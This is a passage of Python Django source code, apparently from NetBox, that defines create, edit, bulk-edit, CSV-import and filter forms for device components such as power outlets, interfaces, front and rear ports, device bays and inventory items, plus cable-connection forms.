    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = PowerOutlet
        fields = [
            'device', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit power_port choices to the local device
        # (hasattr guards against an unsaved instance with no device set).
        if hasattr(self.instance, 'device'):
            self.fields['power_port'].queryset = PowerPort.objects.filter(
                device=self.instance.device
            )
class PowerOutletCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk PowerOutlet creation."""
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    power_port = forms.ModelChoiceField(
        queryset=PowerPort.objects.all(),
        required=False
    )
    feed_leg = forms.ChoiceField(
        choices=add_blank_choice(PowerOutletFeedLegChoices),
        required=False
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg', 'description', 'tags')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit power_port queryset to PowerPorts which belong to the parent Device.
        # NOTE(review): Device.objects.get() will raise if neither initial nor
        # submitted data carries a device — presumably the view guarantees one.
        device = Device.objects.get(
            pk=self.initial.get('device') or self.data.get('device')
        )
        self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
class PowerOutletBulkCreateForm(
    form_from_model(PowerOutlet, ['type', 'feed_leg']),
    DeviceBulkAddComponentForm
):
    """Add power outlets to multiple selected devices."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'feed_leg', 'description', 'tags')
class PowerOutletBulkEditForm(
    form_from_model(PowerOutlet, ['label', 'type', 'feed_leg', 'power_port', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for PowerOutlets; power_port editing requires a common parent device."""
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerOutlet.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    device = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
        disabled=True,
        widget=forms.HiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'type', 'feed_leg', 'power_port', 'description')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit power_port queryset to PowerPorts which belong to the parent Device
        if 'device' in self.initial:
            # NOTE(review): .first() may return None for a stale pk, which would
            # yield an empty power_port queryset (device=None) — confirm intended.
            device = Device.objects.filter(pk=self.initial['device']).first()
            self.fields['power_port'].queryset = PowerPort.objects.filter(device=device)
        else:
            # No common device context: disable power_port selection entirely.
            self.fields['power_port'].choices = ()
            self.fields['power_port'].widget.attrs['disabled'] = True
class PowerOutletCSVForm(CSVModelForm):
    """CSV import form for PowerOutlets; the feeding power port must be on the same device (or its VC master)."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    power_port = CSVModelChoiceField(
        queryset=PowerPort.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Local power port which feeds this outlet'
    )
    feed_leg = CSVChoiceField(
        choices=PowerOutletFeedLegChoices,
        required=False,
        help_text='Electrical phase (for three-phase circuits)'
    )

    class Meta:
        model = PowerOutlet
        fields = PowerOutlet.csv_headers

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit PowerPort choices to those belonging to this device (or VC master)
        if self.is_bound:
            # Bound form: resolve the device from the submitted CSV value.
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                device = None
        else:
            # Unbound form: fall back to the instance's device, if any.
            try:
                device = self.instance.device
            except Device.DoesNotExist:
                device = None

        if device:
            self.fields['power_port'].queryset = PowerPort.objects.filter(
                device__in=[device, device.get_vc_master()]
            )
        else:
            # No device resolvable: no power port may be assigned.
            self.fields['power_port'].queryset = PowerPort.objects.none()
#
# Interfaces
#
class InterfaceFilterForm(DeviceComponentFilterForm):
    """Filter form for the Interface list view."""
    model = Interface
    type = forms.MultipleChoiceField(
        choices=InterfaceTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    # Tri-state boolean: blank applies no enabled/disabled filtering.
    enabled = forms.NullBooleanField(
        required=False,
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    mac_address = forms.CharField(
        required=False,
        label='MAC address'
    )
    tag = TagFilterField(model)
class InterfaceForm(BootstrapMixin, InterfaceCommonForm, forms.ModelForm):
    """
    Create/edit form for a single Interface. LAG choices are limited to LAG
    interfaces on the same device (or a peer virtual-chassis member), and VLAN
    choices are scoped to the device's site.
    """
    untagged_vlan = DynamicModelChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        label='Untagged VLAN',
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; the real site_id is added in __init__ once the device is known.
            'site_id': 'null',
        }
    )
    tagged_vlans = DynamicModelMultipleChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        label='Tagged VLANs',
        display_field='display_name',
        brief_mode=False,
        query_params={
            'site_id': 'null',
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Interface
        fields = [
            'device', 'name', 'label', 'type', 'enabled', 'lag', 'mac_address', 'mtu', 'mgmt_only', 'description',
            'mode', 'untagged_vlan', 'tagged_vlans', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
            'type': StaticSelect2(),
            'lag': StaticSelect2(),
            'mode': StaticSelect2(),
        }
        labels = {
            'mode': '802.1Q Mode',
        }
        help_texts = {
            'mode': INTERFACE_MODE_HELP_TEXT,
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Resolve the parent device from submitted data (bound) or the instance (unbound).
        if self.is_bound:
            device = Device.objects.get(pk=self.data['device'])
        else:
            device = self.instance.device

        # Limit LAG choices to interfaces belonging to this device or a peer VC member
        device_query = Q(device=device)
        if device.virtual_chassis:
            device_query |= Q(device__virtual_chassis=device.virtual_chassis)
        self.fields['lag'].queryset = Interface.objects.filter(
            device_query,
            type=InterfaceTypeChoices.TYPE_LAG
        ).exclude(pk=self.instance.pk)  # An interface cannot be its own LAG parent

        # Add current site to VLANs query params
        self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
        self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceCreateForm(ComponentCreateForm, InterfaceCommonForm):
    """
    Creation form supporting name/label patterns for bulk Interface creation.
    LAG and VLAN choices are scoped to the parent device (see __init__).
    """
    type = forms.ChoiceField(
        choices=InterfaceTypeChoices,
        widget=StaticSelect2(),
    )
    enabled = forms.BooleanField(
        required=False,
        initial=True
    )
    lag = forms.ModelChoiceField(
        queryset=Interface.objects.all(),
        required=False,
        label='Parent LAG',
        widget=StaticSelect2(),
    )
    mtu = forms.IntegerField(
        required=False,
        min_value=INTERFACE_MTU_MIN,
        max_value=INTERFACE_MTU_MAX,
        label='MTU'
    )
    mac_address = forms.CharField(
        required=False,
        label='MAC Address'
    )
    mgmt_only = forms.BooleanField(
        required=False,
        label='Management only',
        help_text='This interface is used only for out-of-band management'
    )
    mode = forms.ChoiceField(
        choices=add_blank_choice(InterfaceModeChoices),
        required=False,
        widget=StaticSelect2(),
    )
    untagged_vlan = DynamicModelChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; the real site_id is added in __init__ once the device is known.
            'site_id': 'null',
        }
    )
    tagged_vlans = DynamicModelMultipleChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            'site_id': 'null',
        }
    )
    field_order = (
        'device', 'name_pattern', 'label_pattern', 'type', 'enabled', 'lag', 'mtu', 'mac_address', 'description',
        'mgmt_only', 'mode', 'untagged_vlan', 'tagged_vlans', 'tags'
    )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit LAG choices to interfaces belonging to this device or a peer VC member.
        # NOTE(review): raises Device.DoesNotExist if no device is supplied —
        # presumably the view guarantees one.
        device = Device.objects.get(
            pk=self.initial.get('device') or self.data.get('device')
        )
        device_query = Q(device=device)
        if device.virtual_chassis:
            device_query |= Q(device__virtual_chassis=device.virtual_chassis)
        self.fields['lag'].queryset = Interface.objects.filter(device_query, type=InterfaceTypeChoices.TYPE_LAG)

        # Add current site to VLANs query params
        self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
        self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceBulkCreateForm(
    form_from_model(Interface, ['type', 'enabled', 'mtu', 'mgmt_only']),
    DeviceBulkAddComponentForm
):
    """Add interfaces to multiple selected devices."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'enabled', 'mtu', 'mgmt_only', 'description', 'tags')
class InterfaceBulkEditForm(
    form_from_model(Interface, [
        'label', 'type', 'lag', 'mac_address', 'mtu', 'description', 'mode'
    ]),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """
    Bulk-edit form for Interfaces. LAG editing requires a common parent device;
    VLAN choices are scoped to a site only when all selected interfaces share one.
    """
    pk = forms.ModelMultipleChoiceField(
        queryset=Interface.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    device = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
        disabled=True,
        widget=forms.HiddenInput()
    )
    enabled = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect
    )
    mgmt_only = forms.NullBooleanField(
        required=False,
        widget=BulkEditNullBooleanSelect,
        label='Management only'
    )
    untagged_vlan = DynamicModelChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            # Placeholder; a real site_id may be added in __init__.
            'site_id': 'null',
        }
    )
    tagged_vlans = DynamicModelMultipleChoiceField(
        queryset=VLAN.objects.all(),
        required=False,
        display_field='display_name',
        brief_mode=False,
        query_params={
            'site_id': 'null',
        }
    )

    class Meta:
        nullable_fields = (
            'label', 'lag', 'mac_address', 'mtu', 'description', 'mode', 'untagged_vlan', 'tagged_vlans'
        )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit LAG choices to interfaces which belong to the parent device (or VC master)
        if 'device' in self.initial:
            device = Device.objects.filter(pk=self.initial['device']).first()
            self.fields['lag'].queryset = Interface.objects.filter(
                device__in=[device, device.get_vc_master()],
                type=InterfaceTypeChoices.TYPE_LAG
            )

            # Add current site to VLANs query params
            self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
            self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
        else:
            # See 4523
            if 'pk' in self.initial:
                site = None
                interfaces = Interface.objects.filter(pk__in=self.initial['pk']).prefetch_related('device__site')

                # Check interface sites.  First interface should set site, further interfaces will either continue the
                # loop or reset back to no site and break the loop.
                for interface in interfaces:
                    if site is None:
                        site = interface.device.site
                    elif interface.device.site is not site:
                        site = None
                        break

                if site is not None:
                    self.fields['untagged_vlan'].widget.add_query_param('site_id', site.pk)
                    self.fields['tagged_vlans'].widget.add_query_param('site_id', site.pk)

            # Without a common device, LAG assignment cannot be edited in bulk.
            self.fields['lag'].choices = ()
            self.fields['lag'].widget.attrs['disabled'] = True

    def clean(self):
        super().clean()

        # Untagged interfaces cannot be assigned tagged VLANs
        if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and self.cleaned_data['tagged_vlans']:
            raise forms.ValidationError({
                'mode': "An access interface cannot have tagged VLANs assigned."
            })

        # Remove all tagged VLAN assignments from "tagged all" interfaces
        elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
            self.cleaned_data['tagged_vlans'] = []
class InterfaceCSVForm(CSVModelForm):
    """CSV import form for Interfaces; the parent LAG must be on the same device or virtual chassis."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    lag = CSVModelChoiceField(
        queryset=Interface.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Parent LAG interface'
    )
    type = CSVChoiceField(
        choices=InterfaceTypeChoices,
        help_text='Physical medium'
    )
    mode = CSVChoiceField(
        choices=InterfaceModeChoices,
        required=False,
        help_text='IEEE 802.1Q operational mode (for L2 interfaces)'
    )

    class Meta:
        model = Interface
        fields = Interface.csv_headers

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit LAG choices to interfaces belonging to this device (or virtual chassis)
        device = None
        if self.is_bound and 'device' in self.data:
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                pass
        if device and device.virtual_chassis:
            self.fields['lag'].queryset = Interface.objects.filter(
                Q(device=device) | Q(device__virtual_chassis=device.virtual_chassis),
                type=InterfaceTypeChoices.TYPE_LAG
            )
        elif device:
            self.fields['lag'].queryset = Interface.objects.filter(
                device=device,
                type=InterfaceTypeChoices.TYPE_LAG
            )
        else:
            # No device resolvable: no LAG may be assigned.
            self.fields['lag'].queryset = Interface.objects.none()

    def clean_enabled(self):
        # Make sure enabled is True when it's not included in the uploaded data
        if 'enabled' not in self.data:
            return True
        else:
            return self.cleaned_data['enabled']
#
# Front pass-through ports
#
class FrontPortFilterForm(DeviceComponentFilterForm):
    """Filter form for the FrontPort list view."""
    model = FrontPort
    type = forms.MultipleChoiceField(
        choices=PortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class FrontPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single FrontPort; the mapped rear port must be local."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = FrontPort
        fields = [
            'device', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
            'type': StaticSelect2(),
            'rear_port': StaticSelect2(),
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit RearPort choices to the local device
        # (hasattr guards against an unsaved instance with no device set).
        if hasattr(self.instance, 'device'):
            self.fields['rear_port'].queryset = self.fields['rear_port'].queryset.filter(
                device=self.instance.device
            )
# TODO: Merge with FrontPortTemplateCreateForm to remove duplicate logic
class FrontPortCreateForm(ComponentCreateForm):
    """
    Creation form for FrontPorts. Each created front port must be paired with a
    free (rear port, position) mapping on the same device; the pairing set is
    validated to match the number of names generated by the pattern.
    """
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2(),
    )
    # Choices are "<rear_port_pk>:<position>" strings, populated in __init__.
    rear_port_set = forms.MultipleChoiceField(
        choices=[],
        label='Rear ports',
        help_text='Select one rear port assignment for each front port being created.',
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description', 'tags')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        device = Device.objects.get(
            pk=self.initial.get('device') or self.data.get('device')
        )

        # Determine which rear port positions are occupied. These will be excluded from the list of available
        # mappings.
        occupied_port_positions = [
            (front_port.rear_port_id, front_port.rear_port_position)
            for front_port in device.frontports.all()
        ]

        # Populate rear port choices
        choices = []
        rear_ports = RearPort.objects.filter(device=device)
        for rear_port in rear_ports:
            # Positions are 1-based; offer every position not already mapped.
            for i in range(1, rear_port.positions + 1):
                if (rear_port.pk, i) not in occupied_port_positions:
                    choices.append(
                        ('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
                    )
        self.fields['rear_port_set'].choices = choices

    def clean(self):
        super().clean()

        # Validate that the number of ports being created equals the number of selected (rear port, position) tuples
        front_port_count = len(self.cleaned_data['name_pattern'])
        rear_port_count = len(self.cleaned_data['rear_port_set'])
        if front_port_count != rear_port_count:
            raise forms.ValidationError({
                'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
                                 'were selected. These counts must match.'.format(front_port_count, rear_port_count)
            })

    def get_iterative_data(self, iteration):
        """Return the rear port mapping for the ``iteration``-th created front port."""

        # Assign rear port and position from selected set
        rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')

        return {
            'rear_port': int(rear_port),
            'rear_port_position': int(position),
        }
# class FrontPortBulkCreateForm(
# form_from_model(FrontPort, ['label', 'type', 'description', 'tags']),
# DeviceBulkAddComponentForm
# ):
# pass
class FrontPortBulkEditForm(
    form_from_model(FrontPort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for FrontPorts selected via hidden ``pk``."""
    pk = forms.ModelMultipleChoiceField(
        queryset=FrontPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class FrontPortCSVForm(CSVModelForm):
    """CSV import form for FrontPorts; the mapped rear port must be on the same device (or its VC master)."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    rear_port = CSVModelChoiceField(
        queryset=RearPort.objects.all(),
        to_field_name='name',
        help_text='Corresponding rear port'
    )
    type = CSVChoiceField(
        choices=PortTypeChoices,
        help_text='Physical medium classification'
    )

    class Meta:
        model = FrontPort
        fields = FrontPort.csv_headers
        help_texts = {
            'rear_port_position': 'Mapped position on corresponding rear port',
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit RearPort choices to those belonging to this device (or VC master)
        if self.is_bound:
            # Bound form: resolve the device from the submitted CSV value.
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                device = None
        else:
            # Unbound form: fall back to the instance's device, if any.
            try:
                device = self.instance.device
            except Device.DoesNotExist:
                device = None

        if device:
            self.fields['rear_port'].queryset = RearPort.objects.filter(
                device__in=[device, device.get_vc_master()]
            )
        else:
            # No device resolvable: no rear port may be assigned.
            self.fields['rear_port'].queryset = RearPort.objects.none()
#
# Rear pass-through ports
#
class RearPortFilterForm(DeviceComponentFilterForm):
    """Filter form for the RearPort list view."""
    model = RearPort
    type = forms.MultipleChoiceField(
        choices=PortTypeChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    tag = TagFilterField(model)
class RearPortForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single RearPort; parent device is fixed via hidden input."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = RearPort
        fields = [
            'device', 'name', 'label', 'type', 'positions', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
            'type': StaticSelect2(),
        }
class RearPortCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk RearPort creation."""
    type = forms.ChoiceField(
        choices=PortTypeChoices,
        widget=StaticSelect2(),
    )
    positions = forms.IntegerField(
        min_value=REARPORT_POSITIONS_MIN,
        max_value=REARPORT_POSITIONS_MAX,
        initial=1,
        help_text='The number of front ports which may be mapped to each rear port'
    )
    field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkCreateForm(
    form_from_model(RearPort, ['type', 'positions']),
    DeviceBulkAddComponentForm
):
    """Add rear ports to multiple selected devices."""
    field_order = ('name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkEditForm(
    form_from_model(RearPort, ['label', 'type', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for RearPorts selected via hidden ``pk``."""
    pk = forms.ModelMultipleChoiceField(
        queryset=RearPort.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class RearPortCSVForm(CSVModelForm):
    """CSV import form for RearPorts; parent device is matched by name."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    type = CSVChoiceField(
        help_text='Physical medium classification',
        choices=PortTypeChoices,
    )

    class Meta:
        model = RearPort
        fields = RearPort.csv_headers
        help_texts = {
            'positions': 'Number of front ports which may be mapped'
        }
#
# Device bays
#
class DeviceBayFilterForm(DeviceComponentFilterForm):
    """Filter form for the DeviceBay list view."""
    model = DeviceBay
    tag = TagFilterField(model)
class DeviceBayForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single DeviceBay; parent device is fixed via hidden input."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = DeviceBay
        fields = [
            'device', 'name', 'label', 'description', 'tags',
        ]
        widgets = {
            'device': forms.HiddenInput(),
        }
class DeviceBayCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk DeviceBay creation."""
    field_order = ('device', 'name_pattern', 'label_pattern', 'description', 'tags')
class PopulateDeviceBayForm(BootstrapMixin, forms.Form):
    """Form for installing an existing child Device into a given DeviceBay."""
    installed_device = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        label='Child Device',
        help_text="Child devices must first be created and assigned to the site/rack of the parent device.",
        widget=StaticSelect2(),
    )

    def __init__(self, device_bay, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Eligible children: same site/rack as the parent, not already installed
        # in a bay, zero-U child-role device types, and not the parent itself.
        self.fields['installed_device'].queryset = Device.objects.filter(
            site=device_bay.device.site,
            rack=device_bay.device.rack,
            parent_bay__isnull=True,
            device_type__u_height=0,
            device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
        ).exclude(pk=device_bay.device.pk)
class DeviceBayBulkCreateForm(DeviceBulkAddComponentForm):
    """Add device bays to multiple selected devices."""
    field_order = ('name_pattern', 'label_pattern', 'description', 'tags')
class DeviceBayBulkEditForm(
    form_from_model(DeviceBay, ['label', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk-edit form for DeviceBays selected via hidden ``pk``."""
    pk = forms.ModelMultipleChoiceField(
        queryset=DeviceBay.objects.all(),
        widget=forms.MultipleHiddenInput()
    )

    class Meta:
        nullable_fields = ('label', 'description')
class DeviceBayCSVForm(CSVModelForm):
    """
    CSV import form for DeviceBays. The optional installed child device is
    restricted to eligible children of the bay's parent device (same site/rack,
    not already installed, zero-U child-role device type).
    """
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    installed_device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
        to_field_name='name',
        help_text='Child device installed within this bay',
        error_messages={
            'invalid_choice': 'Child device not found.',
        }
    )

    class Meta:
        model = DeviceBay
        fields = DeviceBay.csv_headers

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Limit installed device choices to devices of the correct type and location
        if self.is_bound:
            try:
                device = self.fields['device'].to_python(self.data['device'])
            except forms.ValidationError:
                device = None
        else:
            try:
                device = self.instance.device
            except Device.DoesNotExist:
                device = None

        if device:
            self.fields['installed_device'].queryset = Device.objects.filter(
                site=device.site,
                rack=device.rack,
                parent_bay__isnull=True,
                device_type__u_height=0,
                device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
            ).exclude(pk=device.pk)
        else:
            # BUGFIX: the empty fallback queryset previously came from
            # Interface.objects.none() — the wrong model for this Device field.
            self.fields['installed_device'].queryset = Device.objects.none()
#
# Inventory items
#
class InventoryItemForm(BootstrapMixin, forms.ModelForm):
    """Create/edit form for a single InventoryItem; parent item choices follow the selected device."""
    device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        display_field='display_name'
    )
    parent = DynamicModelChoiceField(
        queryset=InventoryItem.objects.all(),
        required=False,
        query_params={
            'device_id': '$device'
        }
    )
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = InventoryItem
        fields = [
            'device', 'parent', 'name', 'label', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'description',
            'tags',
        ]
class InventoryItemCreateForm(ComponentCreateForm):
    """Creation form supporting name/label patterns for bulk InventoryItem creation."""
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    parent = DynamicModelChoiceField(
        queryset=InventoryItem.objects.all(),
        required=False,
        query_params={
            'device_id': '$device'
        }
    )
    part_id = forms.CharField(
        max_length=50,
        required=False,
        label='Part ID'
    )
    serial = forms.CharField(
        max_length=50,
        required=False,
    )
    asset_tag = forms.CharField(
        max_length=50,
        required=False,
    )
    field_order = (
        'device', 'parent', 'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag',
        'description', 'tags',
    )
class InventoryItemCSVForm(CSVModelForm):
    """CSV import form for InventoryItem; device and manufacturer are matched by name."""
    device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name'
    )
    manufacturer = CSVModelChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='name',
        required=False
    )
    class Meta:
        model = InventoryItem
        fields = InventoryItem.csv_headers
class InventoryItemBulkCreateForm(
    form_from_model(InventoryItem, ['manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered']),
    DeviceBulkAddComponentForm
):
    """Bulk-add InventoryItems to multiple devices; fields are derived from the model."""
    field_order = (
        'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered', 'description',
        'tags',
    )
class InventoryItemBulkEditForm(
    form_from_model(InventoryItem, ['label', 'manufacturer', 'part_id', 'description']),
    BootstrapMixin,
    AddRemoveTagsForm,
    BulkEditForm
):
    """Bulk edit of selected InventoryItems (selection carried in hidden pk field)."""
    pk = forms.ModelMultipleChoiceField(
        queryset=InventoryItem.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    manufacturer = DynamicModelChoiceField(
        queryset=Manufacturer.objects.all(),
        required=False
    )
    class Meta:
        # Fields that a blank submission clears (set to null/empty) rather than skips.
        nullable_fields = ('label', 'manufacturer', 'part_id', 'description')
class InventoryItemFilterForm(DeviceComponentFilterForm):
    """Filter sidebar form for the InventoryItem list view."""
    model = InventoryItem
    manufacturer = DynamicModelMultipleChoiceField(
        queryset=Manufacturer.objects.all(),
        to_field_name='slug',
        required=False
    )
    serial = forms.CharField(
        required=False
    )
    asset_tag = forms.CharField(
        required=False
    )
    discovered = forms.NullBooleanField(
        required=False,
        widget=StaticSelect2(
            choices=BOOLEAN_WITH_BLANK_CHOICES
        )
    )
    tag = TagFilterField(model)
#
# Cables
#
class ConnectCableToDeviceForm(BootstrapMixin, CustomFieldModelForm):
    """
    Base form for connecting a Cable to a Device component
    """
    # The "termination B" chain narrows progressively: region -> site -> rack -> device.
    termination_b_region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        label='Region',
        required=False
    )
    termination_b_site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        label='Site',
        required=False,
        query_params={
            'region_id': '$termination_b_region'
        }
    )
    termination_b_rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        label='Rack',
        required=False,
        display_field='display_name',
        null_option='None',
        query_params={
            'site_id': '$termination_b_site'
        }
    )
    termination_b_device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        label='Device',
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$termination_b_site',
            'rack_id': '$termination_b_rack',
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )
    class Meta:
        model = Cable
        fields = [
            'termination_b_region', 'termination_b_site', 'termination_b_rack', 'termination_b_device',
            'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
        ]
        widgets = {
            'status': StaticSelect2,
            'type': StaticSelect2,
            'length_unit': StaticSelect2,
        }
    def clean_termination_b_id(self):
        # Return the PK rather than the object
        return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToConsolePortForm(ConnectCableToDeviceForm):
    """Connect a cable's B side to a ConsolePort on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=ConsolePort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToConsoleServerPortForm(ConnectCableToDeviceForm):
    """Connect a cable's B side to a ConsoleServerPort on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=ConsoleServerPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToPowerPortForm(ConnectCableToDeviceForm):
    """Connect a cable's B side to a PowerPort on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=PowerPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToPowerOutletForm(ConnectCableToDeviceForm):
    """Connect a cable's B side to a PowerOutlet on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=PowerOutlet.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToInterfaceForm(ConnectCableToDeviceForm):
    """Connect a cable's B side to a physical Interface on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=Interface.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device',
            'kind': 'physical',
        }
    )
class ConnectCableToFrontPortForm(ConnectCableToDeviceForm):
    """Connect a cable's B side to a FrontPort on the selected device."""
    termination_b_id = DynamicModelChoiceField(
        queryset=FrontPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToRearPortForm(ConnectCableToDeviceForm):
